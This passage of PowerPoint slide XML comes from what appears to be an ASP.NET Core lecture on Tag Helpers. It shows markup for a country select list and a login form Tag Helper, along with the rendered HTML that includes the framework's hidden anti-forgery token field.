          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ"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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="USA"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>United States</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>option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cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="--"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16738902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Tag Helper</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asp-controller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asp-action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asp-route-customparam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="/Account/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Login?customparam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="post"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RequestVerificationToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
